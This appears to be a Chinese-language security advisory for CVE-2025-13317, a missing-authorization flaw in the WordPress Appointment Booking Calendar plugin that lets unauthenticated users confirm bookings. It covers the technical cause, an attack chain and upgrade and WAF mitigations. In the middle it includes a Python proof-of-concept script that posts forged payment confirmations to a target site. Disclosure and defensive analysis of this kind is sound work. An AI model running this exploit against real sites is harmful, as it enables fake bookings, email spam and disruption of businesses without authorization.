CVE-2025-13317 WordPress Appointment Booking Calendar未授权预订确认漏洞

漏洞信息

漏洞编号

CVE-2025-13317

漏洞类型

缺少授权控制

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Appointment Booking Calendar plugin for WordPress

漏洞概述

CVE-2025-13317是WordPress Appointment Booking Calendar插件中的一个严重安全漏洞。该插件是一款广泛应用于WordPress网站的预约预订日历插件，用户数量众多。漏洞存在于插件的预订处理端点，由于缺乏适当的授权验证机制，允许未认证的攻击者执行未经授权的操作。具体而言，插件暴露了一个名为cpabc_appointments_check_IPN_verification的预订处理端点，该端点在处理支付通知时信任攻击者提供的数据，而不验证其来源或真实性。攻击者可以通过cpabc_ipncheck参数任意确认预订并将虚假预订插入到活动日历中，从而触发管理员和客户的通知邮件，造成运营中断。此漏洞影响所有版本直至1.3.96版本。由于该插件被广泛应用于各种商业网站，包括医疗机构、律师事务所、咨询公司等，攻击者可能利用此漏洞进行恶意预订、垃圾邮件传播或破坏正常业务运营。CVSS评分为5.3，属于中等严重程度，主要影响系统的完整性和可用性。

技术细节

该漏洞的根本原因在于Appointment Booking Calendar插件在处理IPN（Instant Payment Notification，即时支付通知）时缺少适当的授权检查。插件的cpabc_appointments_check_IPN_verification函数直接处理来自cpabc_ipncheck参数的请求，而没有验证请求是否来自合法的支付提供商或是否具有相应的授权权限。攻击者可以构造恶意的HTTP POST请求，伪造支付确认信息，触发预订确认流程。成功利用后，系统会将伪造的预订记录写入数据库，同时自动发送通知邮件给管理员和客户。攻击者可以通过批量发送请求来实现大规模攻击，不断向目标网站的日历中插入虚假预订，导致正常用户无法正常使用预约服务。此外，大量通知邮件的发送可能触发邮件服务器的限流机制，影响正常邮件的收发。从代码层面看，问题出在inc/cpabc_apps_go.inc.php文件的第14行、363行和476行附近，这些代码段在处理IPN验证时未进行权限校验。

攻击链分析

STEP 1

步骤1

攻击者识别使用Appointment Booking Calendar插件的WordPress网站

STEP 2

步骤2

攻击者发现暴露的未授权端点cpabc_appointments_check_IPN_verification

STEP 3

步骤3

攻击者构造恶意HTTP POST请求，通过cpabc_ipncheck参数注入伪造的支付确认数据

STEP 4

步骤4

服务器端点缺少授权检查，直接信任攻击者提供的参数值

STEP 5

步骤5

系统将伪造的预订记录写入数据库，状态标记为已确认

STEP 6

步骤6

系统自动向管理员和客户发送预订确认通知邮件

STEP 7

步骤7

攻击者重复执行实现大规模虚假预订注入，导致正常业务运营中断

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-13317 PoC
# Missing Authorization in Appointment Booking Calendar < 1.3.97
# Attackers can confirm arbitrary bookings via cpabc_ipncheck parameter

def exploit(target_url, booking_id):
    """
    Exploit for CVE-2025-13317
    
    Args:
        target_url: Target WordPress site URL
        booking_id: ID of the booking to confirm
    
    Returns:
        Response from the server
    """
    # Target endpoint exposed by the plugin
    endpoint = f"{target_url}/?cpabc_ipncheck=1"
    
    # Malicious payload to confirm arbitrary booking
    # The endpoint trusts attacker-supplied data without verification
    data = {
        'cpabc_ipncheck': '1',
        'booking_id': str(booking_id),
        'status': 'confirmed',
        'payment_status': 'completed'
    }
    
    # Send request without any authentication
    try:
        response = requests.post(endpoint, data=data, timeout=10)
        return response.text, response.status_code
    except requests.exceptions.RequestException as e:
        return f"Error: {str(e)}", None

if __name__ == '__main__':
    if len(sys.argv) < 3:
        print("Usage: python cve-2025-13317.py <target_url> <booking_id>")
        print("Example: python cve-2025-13317.py http://example.com 12345")
        sys.exit(1)
    
    target = sys.argv[1]
    booking = sys.argv[2]
    
    print(f"[*] Exploiting CVE-2025-13317 on {target}")
    print(f"[*] Attempting to confirm booking ID: {booking}")
    
    result, status = exploit(target, booking)
    print(f"[*] Response Status: {status}")
    print(f"[*] Response: {result[:500]}")

影响范围

Appointment Booking Calendar plugin for WordPress <= 1.3.96

防御指南

临时缓解措施

立即将Appointment Booking Calendar插件升级到1.3.97或更高版本。如果暂时无法升级，可在Web应用防火墙(WAF)层面添加规则，阻止对cpabc_ipncheck参数的未授权访问。同时监控服务器日志，排查异常的预订确认请求。